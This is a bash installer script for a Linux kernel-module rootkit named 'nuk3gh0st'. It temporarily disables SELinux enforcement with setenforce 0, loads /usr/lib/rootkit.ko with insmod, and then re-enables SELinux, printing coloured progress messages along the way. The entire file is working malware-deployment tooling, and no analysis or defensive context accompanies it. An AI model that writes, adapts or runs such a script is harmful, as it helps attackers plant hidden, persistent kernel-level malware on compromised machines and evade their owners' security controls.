#!/bin/bash

green='\e[0;32m'
red='\e[0;31m'
endColor='\e[0m'
item=${green}[*]${endColor}

echo -e "${green}#################################${endColor}"
echo -e "${green}# Loading nuk3gh0st LKM rootkit #${endColor}"
echo -e "${green}#################################${endColor}"
echo ""
echo -e "${item}Checking if SELINUX is enabled..."
if [ -f /usr/sbin/setenforce ]; then
	echo -e "${item}SELINUX is enabled"
	echo -e "${item}Disabling SELINUX temporarily"
	echo -e "${red}cmd: setenforce 0${endColor}"
	setenforce 0
	echo -e "${item}Loading nuk3gh0st LKM rootkit"
	echo -e "${red}cmd: insmod /usr/lib/rootkit.ko${endColor}"
        insmod /usr/lib/rootkit.ko
	echo -e "${item}Reenabling SELINUX"
	echo -e "${red}cmd: setenforce 1${endColor}"
	setenforce 1
else
	echo -e "${item}SELINUX is disabled"
	echo -e "${item}Loading nuk3gh0st LKM rootkit"
	echo -e "${red}cmd: insmod /usr/lib/rootkit.ko${endColor}"
        insmod /usr/lib/rootkit.ko
fi
